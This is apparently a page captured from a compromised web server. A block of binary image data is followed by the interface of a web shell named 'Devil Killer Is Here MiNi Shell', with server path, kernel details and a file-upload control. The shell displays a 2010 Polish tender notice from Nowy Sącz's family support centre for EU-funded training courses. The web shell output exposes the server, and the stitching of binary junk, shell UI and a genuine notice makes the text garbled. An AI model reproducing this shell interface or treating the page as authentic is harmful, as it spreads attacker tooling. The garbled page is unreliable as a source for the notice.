JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100922/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100922/302020-N-2010.html

<p class="kh_header"><b>Nowy Sącz: Organizacja i przeprowadzenie szkoleń w ramach realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu projektu pn. W stronę samodzielności i niezależności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 302020 - 2010; data zamieszczenia: 22.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kilińskiego 72A, 33-300 Nowy Sącz, woj. małopolskie, tel. 0-18 4438251, faks 0-18 4442717.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.nowy-sacz.pl, www.pcpr-ns.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń w ramach realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Nowym Sączu projektu pn. W stronę samodzielności i niezależności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I:Zorganizowanie i przeprowadzenie kursu komputerowego
Liczba uczestników szkolenia: 15osób.;osoby niepełnosprawne:12 os.(osoby sprawne ruchowo);wychowankowie placówek opiekuńczo-wychowawczych i rodzin zastępczych: 3 os.
Program zajęć teoretycznych i praktycznych ma obejmować min. 40  godzin.(1h= 45 min.)
Miejsce:Nowy Sącz,istnieje możliwość przeprowadzenia kursu w PCPR w Nowym Sączu-sala do 12 stanowisk bez wyposażenia w sprzęt  
Termin realizacji:do 15 grudnia 2010 r.
Zakres kursu:
zapoznanie się z budową komputera
elementy składowe komputerów
czym są komputery przenośne
wprowadzenie do systemu operacyjnego Windows
jak uruchamiać komputer 
obsługa systemu Windows 
obsługa wbudowanych programów w systemie Windows 
obsługa pakietu biurowego Microsoft Office 
obsługa edytora tekstu Word 
arkusz kalkulacyjny Excel 
program do prezentacji PowerPoint czym jest Internet i jak się w nim poruszać (nawigowanie po stronach www, poczta e-mail).
Zadanie II:Zorganizowanie i przeprowadzenie kursu fotograficznego
Liczba uczestników szkolenia:13osób.:
osoby niepełnosprawne: 12 os. (w tym 9 os. z WTZ Biała Niżna)-osoby sprawne ruchowo, stopień niepełnosprawności umysłowej-umiarkowany,
wychowankowie placówek opiekuńczo-wychowawczych i rodzin zastępczych:1 os.
Program zajęć teoretycznych i praktycznych ma obejmować min.40  godzin.(1h= 45 min.)
Miejsce:Nowy Sącz,istnieje możliwość przeprowadzenia kursu: PCPR Nowy Sącz-sala do 12 stanowisk bez wyposażenia w sprzęt lub WTZ Biała Niżna.  
Termin realizacji: do 15 grudnia 2010 r.
Zakres kursu:
Fotografia w kulturze współczesnej.
Technika i technologia fotografii: aparat fotograficzny - rodzaje, budowa, użytkowanie, możliwości źródła światła i ich wykorzystanie w fotografii, materiały światłoczułe-rodzaje, obróbka, przechowywanie, pomiar światła i wybór parametrów ekspozycji. 
Estetyka fotografii: kompozycja obrazu fotograficznego, wybór tematu i jego lokalizacja w kadrze, kreacyjne możliwości oświetlenia, czasu naświetlania i głębi ostrości.
Klasyczne tematy fotografii:portret, krajobraz, martwa natura, pejzaż miejski.
Zadanie III:Zorganizowanie i przeprowadzenie kursu florystycznego
Liczba uczestników szkolenia:20 osób niepełnosprawnych-osoby sprawne ruchowo, stopień niepełnosprawności
Program zajęć teoretycznych i praktycznych ma obejmować min. 40  godzin. (1h = 45 min.)
Miejsce:Nowy Sącz, istnieje możliwość przeprowadzenia kursu:PCPR Nowy Sącz-sala bez wyposażenia w sprzęt lub WTZ Biała Niżna(11 osób).
Termin realizacji:do 15 grudnia 2010 r.
Zakres kursu:
teoria florystyki-materiałoznawstwo, umiejętność doboru dodatków florystycznych do odpowiednich kompozycji,
teoria barw i kompozycji (dobór materiału florystycznego według zasad dotyczących koła barw),
teoria botaniki-zasady pielęgnacji roślin, ich ochrona i uprawa,
wiązanki okolicznościowe i techniki ich układania (wiązanki do chrztu, komunijne, wianki bransoletki, butonierki, diademy,przypinki),
florystyka ślubna,
florystyka żałobna,
sztuka układania kwiatów w naczyniach,
kolaż (florystyczne obrazy).
Zadanie IV:Zorganizowanie i przeprowadzenie kursu prawa jazdy kat. B z egzaminem.
Liczba uczestników szkolenia:16 osób.Uczestnicy podzieleni będą na grupy:
osoby niepełnosprawne:1 os.(osoba poruszająca się na wózku inwalidzkim - dysfunkcja kończyn dolnych;wykonawca zagwarantuje samochód przystosowany do szkolenia osoby niepełnosprawnej),
wychowankowie  placówek  opiekuńczo-wychowawczych i rodzin zastępczych: 15 os.(miejsce przeprowadzenia kursu: Nowy Sącz).
Program zajęć teoretycznych i praktycznych ma obejmować min. 60  godzin. 
Miejsce: Nowy Sącz
Termin realizacji: do 15 grudnia 2010 r.
Kursanci po skończonym kursie posiadają uprawnienia do kierowania: 
1.pojazdem samochodowym o dopuszczalnej masie całkowitej nieprzekraczającej 3,5t, z wyjątkiem autobusu lub motocykla,
2.pojazdem samochodowym o dopuszczalnej masie całkowitej nieprzekraczającej 3,5t, z przyczepą o dopuszczalnej masie całkowitej nieprzekraczającej masy własnej pojazdu ciągnącego, o ile dopuszczalna masa całkowita zespołu tych pojazdów nie przekracza 3,5t
3.ciągnikiem rolniczym lub pojazdem wolnobieżnym.
1.Szkolenie teoretyczne:
Szkolenie teoretyczne obejmujące 30 godzin. (1h = 45 min.)
Kurs obejmuje następujące lekcje:
Pojęcia podstawowe, szczególna ostrożność, ruch prawostronny, zasada ograniczonego zaufania.
Znaki informacyjne, znaki kierunku i miejscowości, znaki
Znaki poziome.
Znaki zakazu.
Przejazdy kolejowe, zachowanie się wobec pieszych i rowerzystów.
Prędkość i hamowanie.
Włączanie się do ruchu.
Wymijanie, omijanie i cofanie. Wyprzedzanie.
Zmiana kierunku jazdy, zmiana pasa ruchu. Zawracanie.
Jazda w ruchu okrężnym.
Sygnały na drodze. Hierarchia sygnałów i znaków.
Przecinanie się kierunków ruchu.
Zatrzymanie i postój.
Używanie telefonu w samochodzie. AutoMapa. Przewóz dzieci samochodem. Pasy bezpieczeństwa, AIRBAG. Przewóz dzieci do szkół.
Holowanie. Przewóz i zabezpieczenie ładunków. Jazda z przyczepą przyczepką. Łańcuchy śniegowe.
Kategorie prawa jazdy i dokumenty kierowcy.
Kontrola w ruchu drogowym, mandaty i punkty karne.
Alkohol i inne używki. Kolizje i wypadki.
Wyposażenie obowiązkowe, światła zewnętrzne, kontrolki w pojeździe, zasady używania świateł.
Budowa pojazdu. Obsługa codzienna. Wymiana koła.
Technika kierowania pojazdem.
Formalności przed egzaminem. Egzamin praktyczny.
Czynności kontrolno - obsługowe samochodu osobowego
Szkolenie w zakresie pierwszej pomocy.
2.Szkolenie praktyczne:
Po zakończeniu szkolenia teoretycznego rozpoczynają się zajęcia praktyczne. Liczba godzin zajęć praktycznych w zakresie prawa jazdy kat. B wynosi 30 godzin zegarowych. Zajęcia praktyczne prowadzone są na placu manewrowym i w ruchu drogowym.
Zadanie V:Zorganizowanie kursu gobelinowego
Liczba uczestników szkolenia:10 osób niepełnosprawnych(w tym jedna osoba niewidoma 
oraz poruszająca się na wózku inwalidzkim-dysfunkcja kończyn dolnych)
Program zajęć teoretycznych i praktycznych ma obejmować min. 40  godzin.(1h= 45 min.)
Miejsce:Nowy Sącz, istnieje możliwość przeprowadzenia kursu w PCPR Nowy Sącz, sala do 12 stanowisk bez wyposażenia w sprzęt lub WTZ Gostwica,
Termin realizacji:do 15 grudnia 2010 r.
Zakres kursu:
co to jest haft gobelinowy gros point,
ścieg gobelinowy cieniowany,
narzędzia niezbędne do haftu gobelinowego,
kanwy, muliny i wełny gobelinowe- rodzaje i zastosowanie w hafcie gobelinowym,
przykłady haftu gobelinowego,
zajęcia praktyczne z haftu - przygotowanie dywanika.
Zadanie VI:Zorganizowanie i przeprowadzenie kursu gotowania
Liczba uczestników szkolenia: 11 osób niepełnosprawnych
Program zajęć teoretycznych i praktycznych ma obejmować min. 40  godzin. (1h = 45 min.)
Miejsce:Nowy Sącz,istnieje możliwość przeprowadzenia kursu w PCPR Nowy Sącz, sala do 12 stanowisk bez wyposażenia w sprzęt lub WTZ Gostwica,
Termin realizacji: do 15 grudnia 2010 r.
Zakres kursu:
sposoby krojenia i ich wpływ na walory smakowe i estetyczne,
wybór technik obróbki termicznej,
wybór przypraw, ziół, i innych ingredientów,
tworzenie oryginalnych kompozycji esencji kuchni kreatywnej,
nauka tworzenia atrakcyjnej potrawy z niczego,
sztuka ekspresowego przygotowywania potraw.
Zadanie VII: Zorganizowanie i przeprowadzenie kursu języka angielskiego
Liczba uczestników szkolenia: wychowankowie placówek opiekuńczo-wychowawczych i rodzin zastępczych:9 osób. 
Program zajęć teoretycznych i praktycznych ma obejmować min.40  godzin.(1h= 45 min.)
Miejsce:Nowy Sącz, istnieje możliwość przeprowadzenia kursu w PCPR w Nowym Sączu-sala bez wyposażenia w sprzęt,
Termin realizacji:do 15 grudnia 2010 r.
Wykonawca przed rozpoczęciem kursu przeprowadzi test kwalifikujący do grupy podstawowej i zaawansowanej
Zakres kursu:
wprowadzenie szerokiego zakresu słownictwa oraz struktur gramatycznych umożliwiających komunikację w środowisku obcojęzycznym, 
przełamanie bariery komunikacyjnej poprzez  różnorodne ćwiczenia typu: w parach, grupach, rozwiązywanie problemów, odgrywanie scenek rodzajowych,  
ćwiczenie rozumienia języka mówionego w jego różnych odmianach, 
ćwiczenie umiejętności  płynnego wykorzystania struktur leksykalnych i gramatycznych w dość szerokim zakresie sytuacji codziennych i zawodowych, 
rozwijanie umiejętności wygłaszania opinii, brania udziału w dyskusji, rozumienia i pisania tekstów.
Zadanie VIII:Zorganizowanie i przeprowadzenie kursu grafiki komputerowej
Liczba uczestników szkolenia:1 osoba niepełnosprawna: umiarkowany stopień niepełnosprawności; osoba sprawna ruchowo.
Program zajęć teoretycznych i praktycznych ma obejmować min.40  godzin.(1h = 45 min.)
Miejsce:Nowy Sącz,  istnieje możliwość przeprowadzenia kursu w PCPR w Nowym Sączu-sala bez wyposażenia w sprzęt,
Termin realizacji: do 15 grudnia 2010 r.
Zakres kursu:
Wstęp do grafiki komputerowej. 
Program do obróbki grafiki wektorowej CORELDRAW. 
Program do obróbki grafiki bitmapowej PHOTOSHOP. 
Studio grafiki komputerowej - proces tworzenia produktu.
Zadanie IX:Zorganizowanie i przeprowadzenie kursu prawa jazdy kat.C z egzaminem
Liczba uczestników szkolenia:wychowankowie placówek opiekuńczo-wychowawczych i rodzin zastępczych:2 osoby. 
Miejsce:Nowy Sącz
Termin realizacji:do 15 grudnia 2010 r.
Zakres kursu:
20h szkolenia teoretycznego,
30h szkolenia praktycznego,
po ukończeniu kursu kursanci posiadają uprawnienia do prowadzenia pojazdów samochodowych o dopuszczalnej masie całkowitej przekraczającej 3,5t, z wyjątkiem autobusów, a także ciągników rolniczych lub pojazdów wolnobieżnych,
wykonawca zapewni materiały dydaktyczne dla kursantów,
wykonawca zapewni stanowisko komputerowe wyposażone w program do rozwiązywania testów,
wykonawca przeprowadzi formalności związane z przystąpieniem do egzaminu.
Zadanie X:Zorganizowanie i przeprowadzenie kursu wizażu
Liczba uczestników szkolenia:3 osób wychowankowie placówek opiekuńczo-wychowawczych i rodzin zastępczych. 
Program zajęć teoretycznych i praktycznych ma obejmować min.40  godzin.(1h = 45 min.)
Miejsce: Nowy Sącz,istnieje możliwość przeprowadzenia kursu w PCPR w Nowym Sączu-sala bez wyposażenia w sprzęt,
Termin realizacji:do 15 grudnia 2010 r
Zakres kursu:
stanowisko pracy i przybory wizażystki, przygotowanie modelki do makijażu, 
ideały piękna, typizacja, indywidualizacja,
harmonia kolorów, barwy podstawowe, ich typologia, kompozycja i zastosowanie, 
stylizacja-określenie typu urody i sylwetki, dobór fryzury, ubioru, korekcja stylu, figury, twarzy, zastosowanie dodatków, biżuterii, 
techniki wykonywania profesjonalnego wizażu, kamuflaż, korekcja twarzy,
makijaż dzienny, makijaż wieczorowy, elementy makijażu ślubnego.
WYKONAWCA  zobowiązany jest m. innymi do:
organizacji i przeprowadzenia szkoleń w ramach ww Projektu, których ilość została określona w SIWZ,
szkolenia są prowadzone w zakresach tematycznych, z których  każdy stanowi odrębne zadanie, na zasadach-wg wymogów Zamawiającego  i w sposób oraz w orientacyjnych terminach (zakończenie kursów do 15 grudnia 2010 r.) określony w SIWZ,
zapewnienia wykwalifikowanej kadry trenerskiej,
zapewnienia uczestnikom cateringu na czas trwania szkoleń (drożdżówki, woda mineralna typu Muszynianka, kawa typu Nescafe, herbata typu Lipton, cukier, śmietanka do kawy),
przedstawienia Zamawiającemu szczegółowych programów i harmonogramów szkoleń, zajęć,
wystawienia uczestnikom zaświadczenia o odbytych szkoleniach, 
zwrotu uczestnikom kosztów dojazdu z miejsca zamieszkania na miejsce szkolenia, kursu,
zapewnienie transportu uczestnikom szkolenia, kursu z miejsca zamieszkania do miejsca szkolenia i z miejsca szkolenia do miejsca zamieszkania,
ubezpieczenia uczestników szkolenia od następstw nieszczęśliwych wypadków,
prowadzenia dokumentacji szkolenia (w tym również fotograficznej):
dzienna lista obecności,
dziennik zajęć,
lista osób, które rozpoczęły szkolenie,
lista osób, które ukończyły szkolenie,
lista osób, które nie ukończyły szkolenia,
lista wydanych certyfikatów,
kopia certyfikatu dla PCPR w Nowym Sączu.
Wykonawca przekaże Zamawiającemu kserokopie potwierdzonej za zgodność z oryginałem całości dokumentacji szkolenia w terminie 7 dni od jego zakończenia. Dokumentacja szkolenia powinna być oznakowana zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
przeprowadzenia szkolenia także w przypadku innej od wymienionej w SIWZ liczby uczestników,
zastosowane metody nauczania muszą uwzględniać indywidualne podejście do każdego uczestnika, 
warunki pracy osób szkolących się w trakcie szkolenia będą zgodne z przepisami bezpieczeństwa i higieny pracy,
wykonawca zapewni uczestnikom szkoleń, kursów nieodpłatnie materiały szkoleniowe w postaci skryptów-opracowań własnych wykładowców umożliwiających samodzielną naukę, materiałów piśmienniczych (długopis, notatnik A-4, ołówek).
oznakowanie miejsca szkolenia oraz wszelkich dokumentów związanych z organizacją szkolenia zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
wykonania  i prowadzenia szkoleń  zgodnie z innymi wymogami Zamawiającego opisanymi w SIWZ,
wystawienia faktury po zakończeniu każdej z części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych do wysokości 50 % wartości zamówienia przetargowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże wykonanie w przeciągu ostatnich 3 lat co najmniej 3 szkoleń przeprowadzonych w ramach realizacji projektów systemowych współfinansowanych ze środków Europejskiego Funduszu Społecznego o wartości nie mniejszej niż 10.000,00 zł każde, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (należyte wykonanie usług winno być potwierdzone dokumentami np. referencjami). W przypadku gdy Wykonawca rozliczał się będzie w walucie innej niż złoty polski, w celu dokonania przeliczenia na złote polskie, należy przyjąć średni kurs danej waluty, opublikowany przez NBP (wg tabeli A kursów średnich walut obcych) w dniu publikacji ogłoszenia o przedmiotowym zamówieniu w Biuletynie Zamówień Publicznych.
Jeżeli w celu wykazania spełniania warunku w zakresie wiedzy i doświadczenia zamierza polegać na wiedzy i doświadczeniu innych podmiotów wówczas zobowiązany jest on zaangażować te podmioty do realizacji zamówienia odpowiednio do zakresu wykazanej wiedzy i doświadczenia tego podmiotu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
Wykonawca spełni warunek jeżeli wykaże, że osoba-osoby prowadzące posiadają wiedzę i doświadczenie w prowadzeniu szkoleń z zakresu objętego niniejszym zamówieniem</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania dotyczące dokumentów składanych przez wykonawców, o których mowa w pkt 11 SIWZ, reguluje m.in. rozporządzenie Prezesa Rady Ministrów z 30 grudnia 2009 w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U.nr 226,poz.1817.).
2. Oświadczenia, o których mowa w pkt 11.2.1 SIWZ należy przedstawić w oryginale, pozostałe dokumenty wskazane w pkt 11 SIWZ mogą być przedstawione w formie oryginału  lub kopii poświadczonej i opatrzonej klauzulą za zgodność z oryginałem przez Wykonawcę (tj. osoby posiadające umocowanie prawne do reprezentowania firmy lub przez umocowanego Pełnomocnika). 
3. Dokument wielostronicowy przedłożony w formie kopii winien być potwierdzony za zgodność z oryginałem na każdej zapisanej (ponumerowanej) stronie.
4. W przypadku gdy Wykonawcę reprezentuje Pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres pełnomocnictwa, z którego wynika zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy. 
